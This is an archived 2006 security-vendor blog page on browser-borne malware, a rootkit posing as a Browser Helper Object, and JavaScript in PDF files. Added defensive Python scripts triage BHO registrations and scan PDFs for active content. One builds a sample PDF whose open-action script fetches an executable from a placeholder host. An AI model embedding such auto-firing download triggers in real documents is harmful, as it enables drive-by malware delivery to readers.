Archive for September 15th, 2006


Sep15
by Jasper Pimentel (Advanced Threats Researcher)

The web browser is becoming the application most used to launch malware attacks. During the heyday of mass-mailing worms, the email client was the major source of malware infection. Today, in the era of targeted attacks and information theft, the web browser has become the major distribution point for malware.

In fact, a recent study claims that web browsing has surpassed email as the top method for spreading malware. Malicious programs that come from the web do not necessarily originate from websites that offer illicit content such as pornography or serial number generators. On the contrary, the culprit websites often look legitimate in an effort to trick unsuspecting users, as in the case of the website where TROJ_ZLOB.ATH poses as a codec.

There is a common misconception that most malware arrives as an attachment in an email from an unknown sender. This used to be true for worms that mass-mail themselves. But things change, and you may never know whether the next website you visit after reading this blog will trick you into installing a backdoor on your system. In reality, it takes a while for security measures to catch up, so one of the things that can be done to prevent this from happening is to be aware of such issues, which is what this blog is for.


Sep15
by Jasper Pimentel (Advanced Threats Researcher)

Spyware and adware often use the browser as the platform they execute from. By registering themselves as Browser Helper Objects (BHOs), in-process COM DLLs that Internet Explorer loads at startup, they get a chance to execute every time the user fires up the browser to do some web surfing.

But this technique is no longer exclusive to such programs. A rootkit can also register itself as a BHO, as in the case of TROJ_LINKOPTIM.G. Based on initial analysis, this Trojan is the rootkit component of TROJ_RKDICE.H. TROJ_LINKOPTIM.G connects to several URLs hosting scripts that may compromise the security of the affected system. As a security measure, access to these URLs has been blocked. The Trojan also uses a dose of social engineering, presenting itself as a Microsoft Network Monitor API, which is clearly a bogus claim.
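The practical check that follows from this is to enumerate what is actually registered as a BHO and resolve each entry to the DLL it loads, rather than trusting the display name. The script below is an added example, not code from the original post or from Trend Micro: it parses `reg export` output of the two registry locations involved (the BHO list under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`, and each CLSID's `InprocServer32` under `HKCR\CLSID`), compares the result against a known-good baseline, and flags anything that is off the baseline or lives in a user-writable path. The sample registry text, the CLSIDs, the vendor and file names, and the baseline contents are all constructed placeholders. Because a rootkit can hide its own keys from a live export, run the export from an offline hive or a trusted boot medium when a rootkit is suspected.

```python
import re

# Constructed sample (not a real capture): trimmed output of
#   reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" bho.reg
#   reg export HKCR\CLSID clsid.reg
# CLSIDs, names and paths are placeholders; the second entry mimics a DLL that
# advertises itself under a Microsoft-sounding name, as the post describes.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-AAAA-BBBB-CCCC-000000000001}]
"NoExplorer"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{22222222-AAAA-BBBB-CCCC-000000000002}]

[HKEY_CLASSES_ROOT\CLSID\{11111111-AAAA-BBBB-CCCC-000000000001}]
@="Example Vendor PDF Link Helper"

[HKEY_CLASSES_ROOT\CLSID\{11111111-AAAA-BBBB-CCCC-000000000001}\InprocServer32]
@="C:\\Program Files\\Example Vendor\\ActiveX\\ExampleIEHelper.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{22222222-AAAA-BBBB-CCCC-000000000002}]
@="Microsoft Network Monitor API"

[HKEY_CLASSES_ROOT\CLSID\{22222222-AAAA-BBBB-CCCC-000000000002}\InprocServer32]
@="C:\\WINDOWS\\system32\\netmonapi.dll"
"ThreadingModel"="Apartment"
"""

BHO_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"

# Constructed baseline of BHOs that belong on this machine: CLSID -> expected DLL path (lower-case).
# Anything not on it is a lead for the analyst, whatever its display name claims.
KNOWN_GOOD = {
    "{11111111-AAAA-BBBB-CCCC-000000000001}":
        r"c:\program files\example vendor\activex\exampleiehelper.dll",
}

def parse_reg_export(text):
    """Parse .reg text into {key_path: {value_name: value}}; '' is the default (@) value.
    String values are unescaped; other types (dword:, hex:) are kept as their raw text."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and "=" in line:
            name, _, raw = line.partition("=")
            name = "" if name == "@" else name.strip('"')
            if raw.startswith('"') and raw.endswith('"'):
                raw = re.sub(r"\\(.)", r"\1", raw[1:-1])  # undo the \\ and \" escaping
            keys[current][name] = raw
    return keys

def list_bhos(keys):
    """Resolve each registered BHO CLSID to its COM display name and in-process DLL."""
    bhos = []
    for path in keys:
        if path.lower().startswith(BHO_KEY.lower() + "\\"):
            clsid = path.rsplit("\\", 1)[1]
            clsid_key = "HKEY_CLASSES_ROOT\\CLSID\\" + clsid
            bhos.append({
                "clsid": clsid,
                "name": keys.get(clsid_key, {}).get("", ""),
                "dll": keys.get(clsid_key + "\\InprocServer32", {}).get("", ""),
            })
    return bhos

def assess(bho):
    """Triage heuristics only: a hit means 'hash it and check its signature', not 'malware'."""
    reasons = []
    dll = bho["dll"].lower()
    expected = KNOWN_GOOD.get(bho["clsid"])
    if expected is None:
        reasons.append("CLSID not in the known-good baseline")
    elif dll != expected:
        reasons.append("DLL path differs from baseline: " + bho["dll"])
    if not dll:
        reasons.append("no InprocServer32 path: dangling or hidden registration")
    elif re.search(r"\\(temp|documents and settings|users)\\", dll):
        reasons.append("DLL lives in a user-writable location")
    if "microsoft" in bho["name"].lower() and expected is None:
        reasons.append("Microsoft-sounding name with no baseline entry: verify the Authenticode signature")
    return reasons

def review(text):
    """Return {clsid: [reasons]} for every BHO in the export that needs a look."""
    out = {}
    for bho in list_bhos(parse_reg_export(text)):
        reasons = assess(bho)
        if reasons:
            out[bho["clsid"]] = reasons
    return out

if __name__ == "__main__":
    for clsid, reasons in review(SAMPLE_REG).items():
        print(clsid)
        for reason in reasons:
            print("  -", reason)
```

On the constructed sample the vendor helper passes and the "Microsoft Network Monitor API" entry is reported, not because its path is unusual (system32 is exactly where a rootkit would put itself) but because no baseline entry vouches for that CLSID. The name is the attacker's claim; the baseline, the file hash and the Authenticode signature are what you verify.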

A solution for this threat has already been deployed in CPR 3.748.06.


Sep15
by Jasper Pimentel (Advanced Threats Researcher)

Remember the old days when we thought Word documents were safe from viruses because we assumed they did not contain any executable code? The sudden appearance of macro viruses proved us wrong.

The same thing could be happening right now with PDF files read by Adobe Reader. Adobe Reader 7.0 includes functionality that allows JavaScript code embedded in a PDF file to execute.


It is also possible for the application to automatically open a website in the browser if the PDF document contains links. A couple of specially crafted PDF documents have proven this for us. There is no question that this extended functionality will eventually bring about PDF-borne malware that accesses URLs and downloads possibly malicious files onto the affected system. A possible drawback here (for the attackers, that is) is that the application first prompts the user whether to proceed to the website. However, with social engineering, a creative attacker or malware author can succeed despite that security measure.

Please note that this is NOT a vulnerability in the application. It is functionality built into the application itself, and it can be disabled through the preferences in the Edit menu (Edit > Preferences > JavaScript, then clear "Enable Acrobat JavaScript"). With JavaScript disabled, execution of possibly malicious code in a PDF document is avoided. Although we have not yet seen any malware using this method, it is better to always be on guard.
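To make the two features concrete, the script below builds two minimal PDFs and runs a static triage pass over them: one with a plain page, and one whose catalog carries an `/OpenAction` JavaScript action calling `app.launchURL` (the Acrobat JavaScript call that asks the viewer to open a URL in the browser) plus a link annotation with a `/URI` action. It then counts the active-content name tokens, pulls out the inline JavaScript and URI targets, and flags documents where something fires on open and an active action is present. This is an added example, not code from the original post or from Adobe; the sample documents are constructed (the URLs use the reserved, unroutable `example.invalid` domain) and contain no exploit. The scanner is deliberately a baseline: it does not decode `#xx` name escapes or inflate compressed object streams, both of which real samples use to hide, so a clean result is not a clean bill.

```python
import re

# Constructed sample documents (not real malware): one plain page, and the same page
# carrying an /OpenAction JavaScript action plus a /URI link annotation, the two
# features the post describes. example.invalid is a reserved, unroutable domain.
CLEAN_OBJECTS = [
    b"<< /Type /Catalog /Pages 2 0 R >>",
    b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
    b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
]
ACTIVE_OBJECTS = [
    b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
    b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
    b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [5 0 R] >>",
    # Runs as soon as the document opens. app.launchURL is the Acrobat JavaScript call
    # that asks the viewer to open a URL in the browser; Reader shows a prompt first.
    b'<< /Type /Action /S /JavaScript /JS (app.launchURL("http://example.invalid/update.exe", true);) >>',
    # A clickable link with a URI action, the other route from a PDF to the browser.
    b"<< /Type /Annot /Subtype /Link /Rect [72 700 300 720] /A << /S /URI /URI (http://example.invalid/) >> >>",
]

def build_pdf(objects):
    """Assemble numbered objects into a PDF with a correct xref table; object 1 is the catalog."""
    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))
        out += f"{num} 0 obj\n".encode() + body + b"\nendobj\n"
    xref_at = len(out)
    out += f"xref\n0 {len(objects) + 1}\n".encode() + b"0000000000 65535 f \n"
    for off in offsets:
        out += f"{off:010d} 00000 n \n".encode()
    out += f"trailer\n<< /Size {len(objects) + 1} /Root 1 0 R >>\nstartxref\n{xref_at}\n%%EOF\n".encode()
    return bytes(out)

# Name tokens worth counting in a static pass. Triage only: this does not decode #xx
# name escapes or inflate compressed object streams, both of which real samples use to hide.
RISKY_NAMES = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/URI", b"/Launch",
               b"/SubmitForm", b"/EmbeddedFile"]

def scan_pdf(data):
    """Return {name: count} for each risky name token present. Names end at a delimiter,
    so /JS does not match /JSomething. Note /S /URI /URI (...) counts twice: type and key."""
    hits = {}
    for name in RISKY_NAMES:
        n = len(re.findall(re.escape(name) + rb"(?![0-9A-Za-z])", data))
        if n:
            hits[name.decode()] = n
    return hits

def _literals_after(data, key):
    """Contents of every `key (...)` literal string, honouring the balanced nested parentheses
    and backslash escapes PDF literal strings allow (a plain [^)]* regex would truncate them)."""
    out = []
    for m in re.finditer(re.escape(key) + rb"\s*\(", data):
        i, depth = m.end() - 1, 0
        while i < len(data):
            c = data[i:i + 1]
            if c == b"\\":
                i += 2
                continue
            if c == b"(":
                depth += 1
            elif c == b")":
                depth -= 1
                if depth == 0:
                    out.append(data[m.end():i].decode("latin-1"))
                    break
            i += 1
    return out

def extract_js(data):
    """Inline JavaScript sources (/JS (...)); scripts held in streams are not covered."""
    return _literals_after(data, b"/JS")

def extract_uris(data):
    """Targets of /URI actions, the addresses the viewer would hand to the browser."""
    return _literals_after(data, b"/URI")

def needs_review(data):
    """True when something fires automatically (/OpenAction or /AA) and an active action
    is present. A document that only has clickable links is not flagged."""
    hits = scan_pdf(data)
    auto = {"/OpenAction", "/AA"} & set(hits)
    active = {"/JavaScript", "/JS", "/URI", "/Launch", "/SubmitForm"} & set(hits)
    return bool(auto and active)

if __name__ == "__main__":
    for label, objs in (("clean", CLEAN_OBJECTS), ("active", ACTIVE_OBJECTS)):
        pdf = build_pdf(objs)
        print(label, scan_pdf(pdf), "review" if needs_review(pdf) else "ok")
        for src in extract_js(pdf):
            print("  JS:", src)
        for uri in extract_uris(pdf):
            print("  URI:", uri)
```

Opening the "active" document in a JavaScript-enabled Reader 7 would run the script at load time and trigger the prompt the post mentions; with "Enable Acrobat JavaScript" cleared, the `/OpenAction` does nothing while the `/URI` link still works when clicked, which is why the scanner treats the auto-firing trigger, not the link, as the thing to flag.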



© Copyright 2009 Trend Micro Inc. All rights reserved. Legal Notice